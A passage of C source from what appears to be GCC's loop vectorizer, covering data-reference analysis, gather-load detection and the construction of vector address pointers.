base = TREE_OPERAND (gimple_assign_rhs1 (def_stmt), 0);
}
/* The gather builtins need address of the form
loop_invariant + vector * {1, 2, 4, 8}
or
loop_invariant + sign_extend (vector) * { 1, 2, 4, 8 }.
Unfortunately DR_BASE_ADDRESS/DR_OFFSET can be a mixture
of loop invariants/SSA_NAMEs defined in the loop, with casts,
multiplications and additions in it. To get a vector, we need
a single SSA_NAME that will be defined in the loop and will
contain everything that is not loop invariant and that can be
vectorized. The following code attempts to find such a preexistng
SSA_NAME OFF and put the loop invariants into a tree BASE
that can be gimplified before the loop. */
base = get_inner_reference (base, &pbitsize, &pbitpos, &off,
&pmode, &punsignedp, &pvolatilep, false);
gcc_assert (base != NULL_TREE && (pbitpos % BITS_PER_UNIT) == 0);
if (TREE_CODE (base) == MEM_REF)
{
if (!integer_zerop (TREE_OPERAND (base, 1)))
{
if (off == NULL_TREE)
{
offset_int moff = mem_ref_offset (base);
off = wide_int_to_tree (sizetype, moff);
}
else
off = size_binop (PLUS_EXPR, off,
fold_convert (sizetype, TREE_OPERAND (base, 1)));
}
base = TREE_OPERAND (base, 0);
}
else
base = build_fold_addr_expr (base);
if (off == NULL_TREE)
off = size_zero_node;
/* If base is not loop invariant, either off is 0, then we start with just
the constant offset in the loop invariant BASE and continue with base
as OFF, otherwise give up.
We could handle that case by gimplifying the addition of base + off
into some SSA_NAME and use that as off, but for now punt. */
if (!expr_invariant_in_loop_p (loop, base))
{
if (!integer_zerop (off))
return NULL_TREE;
off = base;
base = size_int (pbitpos / BITS_PER_UNIT);
}
/* Otherwise put base + constant offset into the loop invariant BASE
and continue with OFF. */
else
{
base = fold_convert (sizetype, base);
base = size_binop (PLUS_EXPR, base, size_int (pbitpos / BITS_PER_UNIT));
}
/* OFF at this point may be either a SSA_NAME or some tree expression
from get_inner_reference. Try to peel off loop invariants from it
into BASE as long as possible. */
STRIP_NOPS (off);
while (offtype == NULL_TREE)
{
enum tree_code code;
tree op0, op1, add = NULL_TREE;
if (TREE_CODE (off) == SSA_NAME)
{
gimple def_stmt = SSA_NAME_DEF_STMT (off);
if (expr_invariant_in_loop_p (loop, off))
return NULL_TREE;
if (gimple_code (def_stmt) != GIMPLE_ASSIGN)
break;
op0 = gimple_assign_rhs1 (def_stmt);
code = gimple_assign_rhs_code (def_stmt);
op1 = gimple_assign_rhs2 (def_stmt);
}
else
{
if (get_gimple_rhs_class (TREE_CODE (off)) == GIMPLE_TERNARY_RHS)
return NULL_TREE;
code = TREE_CODE (off);
extract_ops_from_tree (off, &code, &op0, &op1);
}
switch (code)
{
case POINTER_PLUS_EXPR:
case PLUS_EXPR:
if (expr_invariant_in_loop_p (loop, op0))
{
add = op0;
off = op1;
do_add:
add = fold_convert (sizetype, add);
if (scale != 1)
add = size_binop (MULT_EXPR, add, size_int (scale));
base = size_binop (PLUS_EXPR, base, add);
continue;
}
if (expr_invariant_in_loop_p (loop, op1))
{
add = op1;
off = op0;
goto do_add;
}
break;
case MINUS_EXPR:
if (expr_invariant_in_loop_p (loop, op1))
{
add = fold_convert (sizetype, op1);
add = size_binop (MINUS_EXPR, size_zero_node, add);
off = op0;
goto do_add;
}
break;
case MULT_EXPR:
if (scale == 1 && tree_fits_shwi_p (op1))
{
scale = tree_to_shwi (op1);
off = op0;
continue;
}
break;
case SSA_NAME:
off = op0;
continue;
CASE_CONVERT:
if (!POINTER_TYPE_P (TREE_TYPE (op0))
&& !INTEGRAL_TYPE_P (TREE_TYPE (op0)))
break;
if (TYPE_PRECISION (TREE_TYPE (op0))
== TYPE_PRECISION (TREE_TYPE (off)))
{
off = op0;
continue;
}
if (TYPE_PRECISION (TREE_TYPE (op0))
< TYPE_PRECISION (TREE_TYPE (off)))
{
off = op0;
offtype = TREE_TYPE (off);
STRIP_NOPS (off);
continue;
}
break;
default:
break;
}
break;
}
/* If at the end OFF still isn't a SSA_NAME or isn't
defined in the loop, punt. */
if (TREE_CODE (off) != SSA_NAME
|| expr_invariant_in_loop_p (loop, off))
return NULL_TREE;
if (offtype == NULL_TREE)
offtype = TREE_TYPE (off);
decl = targetm.vectorize.builtin_gather (STMT_VINFO_VECTYPE (stmt_info),
offtype, scale);
if (decl == NULL_TREE)
return NULL_TREE;
if (basep)
*basep = base;
if (offp)
*offp = off;
if (scalep)
*scalep = scale;
return decl;
}
/* Function vect_analyze_data_refs.
Find all the data references in the loop or basic block.
The general structure of the analysis of data refs in the vectorizer is as
follows:
1- vect_analyze_data_refs(loop/bb): call
compute_data_dependences_for_loop/bb to find and analyze all data-refs
in the loop/bb and their dependences.
2- vect_analyze_dependences(): apply dependence testing using ddrs.
3- vect_analyze_drs_alignment(): check that ref_stmt.alignment is ok.
4- vect_analyze_drs_access(): check that ref_stmt.step is ok.
*/
bool
vect_analyze_data_refs (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo,
int *min_vf, unsigned *n_stmts)
{
struct loop *loop = NULL;
basic_block bb = NULL;
unsigned int i;
vec<data_reference_p> datarefs;
struct data_reference *dr;
tree scalar_type;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_refs ===\n");
if (loop_vinfo)
{
basic_block *bbs = LOOP_VINFO_BBS (loop_vinfo);
loop = LOOP_VINFO_LOOP (loop_vinfo);
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
if (!find_loop_nest (loop, &LOOP_VINFO_LOOP_NEST (loop_vinfo)))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: loop contains function calls"
" or data references that cannot be analyzed\n");
return false;
}
for (i = 0; i < loop->num_nodes; i++)
{
gimple_stmt_iterator gsi;
for (gsi = gsi_start_bb (bbs[i]); !gsi_end_p (gsi); gsi_next (&gsi))
{
gimple stmt = gsi_stmt (gsi);
if (is_gimple_debug (stmt))
continue;
++*n_stmts;
if (!find_data_references_in_stmt (loop, stmt, &datarefs))
{
if (is_gimple_call (stmt) && loop->safelen)
{
tree fndecl = gimple_call_fndecl (stmt), op;
if (fndecl != NULL_TREE)
{
struct cgraph_node *node = cgraph_node::get (fndecl);
if (node != NULL && node->simd_clones != NULL)
{
unsigned int j, n = gimple_call_num_args (stmt);
for (j = 0; j < n; j++)
{
op = gimple_call_arg (stmt, j);
if (DECL_P (op)
|| (REFERENCE_CLASS_P (op)
&& get_base_address (op)))
break;
}
op = gimple_call_lhs (stmt);
/* Ignore #pragma omp declare simd functions
if they don't have data references in the
call stmt itself. */
if (j == n
&& !(op
&& (DECL_P (op)
|| (REFERENCE_CLASS_P (op)
&& get_base_address (op)))))
continue;
}
}
}
LOOP_VINFO_DATAREFS (loop_vinfo) = datarefs;
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: loop contains function "
"calls or data references that cannot "
"be analyzed\n");
return false;
}
}
}
LOOP_VINFO_DATAREFS (loop_vinfo) = datarefs;
}
else
{
gimple_stmt_iterator gsi;
bb = BB_VINFO_BB (bb_vinfo);
for (gsi = gsi_start_bb (bb); !gsi_end_p (gsi); gsi_next (&gsi))
{
gimple stmt = gsi_stmt (gsi);
if (is_gimple_debug (stmt))
continue;
++*n_stmts;
if (!find_data_references_in_stmt (NULL, stmt,
&BB_VINFO_DATAREFS (bb_vinfo)))
{
/* Mark the rest of the basic-block as unvectorizable. */
for (; !gsi_end_p (gsi); gsi_next (&gsi))
{
stmt = gsi_stmt (gsi);
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (stmt)) = false;
}
break;
}
}
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
}
/* Go through the data-refs, check that the analysis succeeded. Update
pointer from stmt_vec_info struct to DR and vectype. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
gimple stmt;
stmt_vec_info stmt_info;
tree base, offset, init;
bool gather = false;
bool simd_lane_access = false;
int vf;
again:
if (!dr || !DR_REF (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unhandled data-ref\n");
return false;
}
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* Discard clobbers from the dataref vector. We will remove
clobber stmts during vectorization. */
if (gimple_clobber_p (stmt))
{
free_data_ref (dr);
if (i == datarefs.length () - 1)
{
datarefs.pop ();
break;
}
datarefs.ordered_remove (i);
dr = datarefs[i];
goto again;
}
/* Check that analysis of the data-ref succeeded. */
if (!DR_BASE_ADDRESS (dr) || !DR_OFFSET (dr) || !DR_INIT (dr)
|| !DR_STEP (dr))
{
bool maybe_gather
= DR_IS_READ (dr)
&& !TREE_THIS_VOLATILE (DR_REF (dr))
&& targetm.vectorize.builtin_gather != NULL;
bool maybe_simd_lane_access
= loop_vinfo && loop->simduid;
/* If target supports vector gather loads, or if this might be
a SIMD lane access, see if they can't be used. */
if (loop_vinfo
&& (maybe_gather || maybe_simd_lane_access)
&& !nested_in_vect_loop_p (loop, stmt))
{
struct data_reference *newdr
= create_data_ref (NULL, loop_containing_stmt (stmt),
DR_REF (dr), stmt, true);
gcc_assert (newdr != NULL && DR_REF (newdr));
if (DR_BASE_ADDRESS (newdr)
&& DR_OFFSET (newdr)
&& DR_INIT (newdr)
&& DR_STEP (newdr)
&& integer_zerop (DR_STEP (newdr)))
{
if (maybe_simd_lane_access)
{
tree off = DR_OFFSET (newdr);
STRIP_NOPS (off);
if (TREE_CODE (DR_INIT (newdr)) == INTEGER_CST
&& TREE_CODE (off) == MULT_EXPR
&& tree_fits_uhwi_p (TREE_OPERAND (off, 1)))
{
tree step = TREE_OPERAND (off, 1);
off = TREE_OPERAND (off, 0);
STRIP_NOPS (off);
if (CONVERT_EXPR_P (off)
&& TYPE_PRECISION (TREE_TYPE (TREE_OPERAND (off,
0)))
< TYPE_PRECISION (TREE_TYPE (off)))
off = TREE_OPERAND (off, 0);
if (TREE_CODE (off) == SSA_NAME)
{
gimple def = SSA_NAME_DEF_STMT (off);
tree reft = TREE_TYPE (DR_REF (newdr));
if (is_gimple_call (def)
&& gimple_call_internal_p (def)
&& (gimple_call_internal_fn (def)
== IFN_GOMP_SIMD_LANE))
{
tree arg = gimple_call_arg (def, 0);
gcc_assert (TREE_CODE (arg) == SSA_NAME);
arg = SSA_NAME_VAR (arg);
if (arg == loop->simduid
/* For now. */
&& tree_int_cst_equal
(TYPE_SIZE_UNIT (reft),
step))
{
DR_OFFSET (newdr) = ssize_int (0);
DR_STEP (newdr) = step;
DR_ALIGNED_TO (newdr)
= size_int (BIGGEST_ALIGNMENT);
dr = newdr;
simd_lane_access = true;
}
}
}
}
}
if (!simd_lane_access && maybe_gather)
{
dr = newdr;
gather = true;
}
}
if (!gather && !simd_lane_access)
free_data_ref (newdr);
}
if (!gather && !simd_lane_access)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: data ref analysis "
"failed ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
return false;
}
}
if (TREE_CODE (DR_BASE_ADDRESS (dr)) == INTEGER_CST)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: base addr of dr is a "
"constant\n");
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
if (TREE_THIS_VOLATILE (DR_REF (dr)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: volatile type ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
return false;
}
if (stmt_can_throw_internal (stmt))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: statement can throw an "
"exception ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
if (TREE_CODE (DR_REF (dr)) == COMPONENT_REF
&& DECL_BIT_FIELD (TREE_OPERAND (DR_REF (dr), 1)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: statement is bitfield "
"access ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
base = unshare_expr (DR_BASE_ADDRESS (dr));
offset = unshare_expr (DR_OFFSET (dr));
init = unshare_expr (DR_INIT (dr));
if (is_gimple_call (stmt)
&& (!gimple_call_internal_p (stmt)
|| (gimple_call_internal_fn (stmt) != IFN_MASK_LOAD
&& gimple_call_internal_fn (stmt) != IFN_MASK_STORE)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: dr in a call ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
/* Update DR field in stmt_vec_info struct. */
/* If the dataref is in an inner-loop of the loop that is considered for
for vectorization, we also want to analyze the access relative to
the outer-loop (DR contains information only relative to the
inner-most enclosing loop). We do that by building a reference to the
first location accessed by the inner-loop, and analyze it relative to
the outer-loop. */
if (loop && nested_in_vect_loop_p (loop, stmt))
{
tree outer_step, outer_base, outer_init;
HOST_WIDE_INT pbitsize, pbitpos;
tree poffset;
machine_mode pmode;
int punsignedp, pvolatilep;
affine_iv base_iv, offset_iv;
tree dinit;
/* Build a reference to the first location accessed by the
inner-loop: *(BASE+INIT). (The first location is actually
BASE+INIT+OFFSET, but we add OFFSET separately later). */
tree inner_base = build_fold_indirect_ref
(fold_build_pointer_plus (base, init));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"analyze in outer-loop: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, inner_base);
dump_printf (MSG_NOTE, "\n");
}
outer_base = get_inner_reference (inner_base, &pbitsize, &pbitpos,
&poffset, &pmode, &punsignedp, &pvolatilep, false);
gcc_assert (outer_base != NULL_TREE);
if (pbitpos % BITS_PER_UNIT != 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"failed: bit offset alignment.\n");
return false;
}
outer_base = build_fold_addr_expr (outer_base);
if (!simple_iv (loop, loop_containing_stmt (stmt), outer_base,
&base_iv, false))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"failed: evolution of base is not affine.\n");
return false;
}
if (offset)
{
if (poffset)
poffset = fold_build2 (PLUS_EXPR, TREE_TYPE (offset), offset,
poffset);
else
poffset = offset;
}
if (!poffset)
{
offset_iv.base = ssize_int (0);
offset_iv.step = ssize_int (0);
}
else if (!simple_iv (loop, loop_containing_stmt (stmt), poffset,
&offset_iv, false))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"evolution of offset is not affine.\n");
return false;
}
outer_init = ssize_int (pbitpos / BITS_PER_UNIT);
split_constant_offset (base_iv.base, &base_iv.base, &dinit);
outer_init = size_binop (PLUS_EXPR, outer_init, dinit);
split_constant_offset (offset_iv.base, &offset_iv.base, &dinit);
outer_init = size_binop (PLUS_EXPR, outer_init, dinit);
outer_step = size_binop (PLUS_EXPR,
fold_convert (ssizetype, base_iv.step),
fold_convert (ssizetype, offset_iv.step));
STMT_VINFO_DR_STEP (stmt_info) = outer_step;
/* FIXME: Use canonicalize_base_object_address (base_iv.base); */
STMT_VINFO_DR_BASE_ADDRESS (stmt_info) = base_iv.base;
STMT_VINFO_DR_INIT (stmt_info) = outer_init;
STMT_VINFO_DR_OFFSET (stmt_info) =
fold_convert (ssizetype, offset_iv.base);
STMT_VINFO_DR_ALIGNED_TO (stmt_info) =
size_int (highest_pow2_factor (offset_iv.base));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"\touter base_address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_BASE_ADDRESS (stmt_info));
dump_printf (MSG_NOTE, "\n\touter offset from base address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_OFFSET (stmt_info));
dump_printf (MSG_NOTE,
"\n\touter constant offset from base address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_INIT (stmt_info));
dump_printf (MSG_NOTE, "\n\touter step: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_STEP (stmt_info));
dump_printf (MSG_NOTE, "\n\touter aligned to: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_ALIGNED_TO (stmt_info));
dump_printf (MSG_NOTE, "\n");
}
}
if (STMT_VINFO_DATA_REF (stmt_info))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: more than one data ref "
"in stmt: ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
STMT_VINFO_DATA_REF (stmt_info) = dr;
if (simd_lane_access)
{
STMT_VINFO_SIMD_LANE_ACCESS_P (stmt_info) = true;
free_data_ref (datarefs[i]);
datarefs[i] = dr;
}
/* Set vectype for STMT. */
scalar_type = TREE_TYPE (DR_REF (dr));
STMT_VINFO_VECTYPE (stmt_info)
= get_vectype_for_scalar_type (scalar_type);
if (!STMT_VINFO_VECTYPE (stmt_info))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: no vectype for stmt: ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, " scalar_type: ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_DETAILS,
scalar_type);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
{
STMT_VINFO_DATA_REF (stmt_info) = NULL;
if (gather)
free_data_ref (dr);
}
return false;
}
else
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"got vectype for stmt: ");
dump_gimple_stmt (MSG_NOTE, TDF_SLIM, stmt, 0);
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_VECTYPE (stmt_info));
dump_printf (MSG_NOTE, "\n");
}
}
/* Adjust the minimal vectorization factor according to the
vector type. */
vf = TYPE_VECTOR_SUBPARTS (STMT_VINFO_VECTYPE (stmt_info));
if (vf > *min_vf)
*min_vf = vf;
if (gather)
{
tree off;
gather = 0 != vect_check_gather (stmt, loop_vinfo, NULL, &off, NULL);
if (gather
&& get_vectype_for_scalar_type (TREE_TYPE (off)) == NULL_TREE)
gather = false;
if (!gather)
{
STMT_VINFO_DATA_REF (stmt_info) = NULL;
free_data_ref (dr);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: not suitable for gather "
"load ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
datarefs[i] = dr;
STMT_VINFO_GATHER_P (stmt_info) = true;
}
else if (loop_vinfo
&& TREE_CODE (DR_STEP (dr)) != INTEGER_CST)
{
if (nested_in_vect_loop_p (loop, stmt)
|| !DR_IS_READ (dr))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: not suitable for strided "
"load ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
STMT_VINFO_STRIDE_LOAD_P (stmt_info) = true;
}
}
/* If we stopped analysis at the first dataref we could not analyze
when trying to vectorize a basic-block mark the rest of the datarefs
as not vectorizable and truncate the vector of datarefs. That
avoids spending useless time in analyzing their dependence. */
if (i != datarefs.length ())
{
gcc_assert (bb_vinfo != NULL);
for (unsigned j = i; j < datarefs.length (); ++j)
{
data_reference_p dr = datarefs[j];
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
free_data_ref (dr);
}
datarefs.truncate (i);
}
return true;
}
/* Function vect_get_new_vect_var.
Returns a name for a new variable. The current naming scheme appends the
prefix "vect_" or "vect_p" (depending on the value of VAR_KIND) to
the name of vectorizer generated variables, and appends that to NAME if
provided. */
tree
vect_get_new_vect_var (tree type, enum vect_var_kind var_kind, const char *name)
{
const char *prefix;
tree new_vect_var;
switch (var_kind)
{
case vect_simple_var:
prefix = "vect";
break;
case vect_scalar_var:
prefix = "stmp";
break;
case vect_pointer_var:
prefix = "vectp";
break;
default:
gcc_unreachable ();
}
if (name)
{
char* tmp = concat (prefix, "_", name, NULL);
new_vect_var = create_tmp_reg (type, tmp);
free (tmp);
}
else
new_vect_var = create_tmp_reg (type, prefix);
return new_vect_var;
}
/* Duplicate ptr info and set alignment/misaligment on NAME from DR. */
static void
vect_duplicate_ssa_name_ptr_info (tree name, data_reference *dr,
stmt_vec_info stmt_info)
{
duplicate_ssa_name_ptr_info (name, DR_PTR_INFO (dr));
unsigned int align = TYPE_ALIGN_UNIT (STMT_VINFO_VECTYPE (stmt_info));
int misalign = DR_MISALIGNMENT (dr);
if (misalign == -1)
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (name));
else
set_ptr_info_alignment (SSA_NAME_PTR_INFO (name), align, misalign);
}
/* Function vect_create_addr_base_for_vector_ref.
Create an expression that computes the address of the first memory location
that will be accessed for a data reference.
Input:
STMT: The statement containing the data reference.
NEW_STMT_LIST: Must be initialized to NULL_TREE or a statement list.
OFFSET: Optional. If supplied, it is be added to the initial address.
LOOP: Specify relative to which loop-nest should the address be computed.
For example, when the dataref is in an inner-loop nested in an
outer-loop that is now being vectorized, LOOP can be either the
outer-loop, or the inner-loop. The first memory location accessed
by the following dataref ('in' points to short):
for (i=0; i<N; i++)
for (j=0; j<M; j++)
s += in[i+j]
is as follows:
if LOOP=i_loop: &in (relative to i_loop)
if LOOP=j_loop: &in+i*2B (relative to j_loop)
BYTE_OFFSET: Optional, defaulted to NULL. If supplied, it is added to the
initial address. Unlike OFFSET, which is number of elements to
be added, BYTE_OFFSET is measured in bytes.
Output:
1. Return an SSA_NAME whose value is the address of the memory location of
the first vector of the data reference.
2. If new_stmt_list is not NULL_TREE after return then the caller must insert
these statement(s) which define the returned SSA_NAME.
FORNOW: We are only handling array accesses with step 1. */
tree
vect_create_addr_base_for_vector_ref (gimple stmt,
gimple_seq *new_stmt_list,
tree offset,
struct loop *loop,
tree byte_offset)
{
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree data_ref_base;
const char *base_name;
tree addr_base;
tree dest;
gimple_seq seq = NULL;
tree base_offset;
tree init;
tree vect_ptr_type;
tree step = TYPE_SIZE_UNIT (TREE_TYPE (DR_REF (dr)));
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
if (loop_vinfo && loop && loop != (gimple_bb (stmt))->loop_father)
{
struct loop *outer_loop = LOOP_VINFO_LOOP (loop_vinfo);
gcc_assert (nested_in_vect_loop_p (outer_loop, stmt));
data_ref_base = unshare_expr (STMT_VINFO_DR_BASE_ADDRESS (stmt_info));
base_offset = unshare_expr (STMT_VINFO_DR_OFFSET (stmt_info));
init = unshare_expr (STMT_VINFO_DR_INIT (stmt_info));
}
else
{
data_ref_base = unshare_expr (DR_BASE_ADDRESS (dr));
base_offset = unshare_expr (DR_OFFSET (dr));
init = unshare_expr (DR_INIT (dr));
}
if (loop_vinfo)
base_name = get_name (data_ref_base);
else
{
base_offset = ssize_int (0);
init = ssize_int (0);
base_name = get_name (DR_REF (dr));
}
/* Create base_offset */
base_offset = size_binop (PLUS_EXPR,
fold_convert (sizetype, base_offset),
fold_convert (sizetype, init));
if (offset)
{
offset = fold_build2 (MULT_EXPR, sizetype,
fold_convert (sizetype, offset), step);
base_offset = fold_build2 (PLUS_EXPR, sizetype,
base_offset, offset);
}
if (byte_offset)
{
byte_offset = fold_convert (sizetype, byte_offset);
base_offset = fold_build2 (PLUS_EXPR, sizetype,
base_offset, byte_offset);
}
/* base + base_offset */
if (loop_vinfo)
addr_base = fold_build_pointer_plus (data_ref_base, base_offset);
else
{
addr_base = build1 (ADDR_EXPR,
build_pointer_type (TREE_TYPE (DR_REF (dr))),
unshare_expr (DR_REF (dr)));
}
vect_ptr_type = build_pointer_type (STMT_VINFO_VECTYPE (stmt_info));
addr_base = fold_convert (vect_ptr_type, addr_base);
dest = vect_get_new_vect_var (vect_ptr_type, vect_pointer_var, base_name);
addr_base = force_gimple_operand (addr_base, &seq, false, dest);
gimple_seq_add_seq (new_stmt_list, seq);
if (DR_PTR_INFO (dr)
&& TREE_CODE (addr_base) == SSA_NAME)
{
vect_duplicate_ssa_name_ptr_info (addr_base, dr, stmt_info);
if (offset || byte_offset)
mark_ptr_info_alignment_unknown (SSA_NAME_PTR_INFO (addr_base));
}
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location, "created ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, addr_base);
dump_printf (MSG_NOTE, "\n");
}
return addr_base;
}
/* Function vect_create_data_ref_ptr.
Create a new pointer-to-AGGR_TYPE variable (ap), that points to the first
location accessed in the loop by STMT, along with the def-use update
chain to appropriately advance the pointer through the loop iterations.
Also set aliasing information for the pointer. This pointer is used by
the callers to this function to create a memory reference expression for
vector load/store access.
Input:
1. STMT: a stmt that references memory. Expected to be of the form
GIMPLE_ASSIGN <name, data-ref> or
GIMPLE_ASSIGN <data-ref, name>.
2. AGGR_TYPE: the type of the reference, which should be either a vector
or an array.
3. AT_LOOP: the loop where the vector memref is to be created.
4. OFFSET (optional): an offset to be added to the initial address accessed
by the data-ref in STMT.
5. BSI: location where the new stmts are to be placed if there is no loop
6. ONLY_INIT: indicate if ap is to be updated in the loop, or remain
pointing to the initial address.
7. BYTE_OFFSET (optional, defaults to NULL): a byte offset to be added
to the initial address accessed by the data-ref in STMT. This is
similar to OFFSET, but OFFSET is counted in elements, while BYTE_OFFSET
in bytes.
Output:
1. Declare a new ptr to vector_type, and have it point to the base of the
data reference (initial addressed accessed by the data reference).
For example, for vector of type V8HI, the following code is generated:
v8hi *ap;
ap = (v8hi *)initial_address;
if OFFSET is not supplied:
initial_address = &a[init];
if OFFSET is supplied:
initial_address = &a[init + OFFSET];
if BYTE_OFFSET is supplied:
initial_address = &a[init] + BYTE_OFFSET;
Return the initial_address in INITIAL_ADDRESS.
2. If ONLY_INIT is true, just return the initial pointer. Otherwise, also
update the pointer in each iteration of the loop.
Return the increment stmt that updates the pointer in PTR_INCR.
3. Set INV_P to true if the access pattern of the data reference in the
vectorized loop is invariant. Set it to false otherwise.
4. Return the pointer. */
tree
vect_create_data_ref_ptr (gimple stmt, tree aggr_type, struct loop *at_loop,
tree offset, tree *initial_address,
gimple_stmt_iterator *gsi, gimple *ptr_incr,
bool only_init, bool *inv_p, tree byte_offset)
{
const char *base_name;
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
loop_vec_info loop_vinfo = STMT_VINFO_LOOP_VINFO (stmt_info);
struct loop *loop = NULL;
bool nested_in_vect_loop = false;
struct loop *containing_loop = NULL;
tree aggr_ptr_type;
tree aggr_ptr;
tree new_temp;
gimple vec_stmt;
gimple_seq new_stmt_list = NULL;
edge pe = NULL;
basic_block new_bb;
tree aggr_ptr_init;
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree aptr;
gimple_stmt_iterator incr_gsi;
bool insert_after;
tree indx_before_incr, indx_after_incr;
gimple incr;
tree step;
bb_vec_info bb_vinfo = STMT_VINFO_BB_VINFO (stmt_info);
gcc_assert (TREE_CODE (aggr_type) == ARRAY_TYPE
|| TREE_CODE (aggr_type) == VECTOR_TYPE);
if (loop_vinfo)
{
loop = LOOP_VINFO_LOOP (loop_vinfo);
nested_in_vect_loop = nested_in_vect_loop_p (loop, stmt);
containing_loop = (gimple_bb (stmt))->loop_father;
pe = loop_preheader_edge (loop);
}
else
{
gcc_assert (bb_vinfo);
only_init = true;
*ptr_incr = NULL;
}
/* Check the step (evolution) of the load in LOOP, and record
whether it's invariant. */
if (nested_in_vect_loop)
step = STMT_VINFO_DR_STEP (stmt_info);
else
step = DR_STEP (STMT_VINFO_DATA_REF (stmt_info));
if (integer_zerop (step))
*inv_p = true;
else
*inv_p = false;
/* Create an expression for the first address accessed by this load
in LOOP. */
base_name = get_name (DR_BASE_ADDRESS (dr));
if (dump_enabled_p ())
{
tree dr_base_type = TREE_TYPE (DR_BASE_OBJECT (dr));
dump_printf_loc (MSG_NOTE, vect_location,
"create %s-pointer variable to type: ",
get_tree_code_name (TREE_CODE (aggr_type)));
dump_generic_expr (MSG_NOTE, TDF_SLIM, aggr_type);
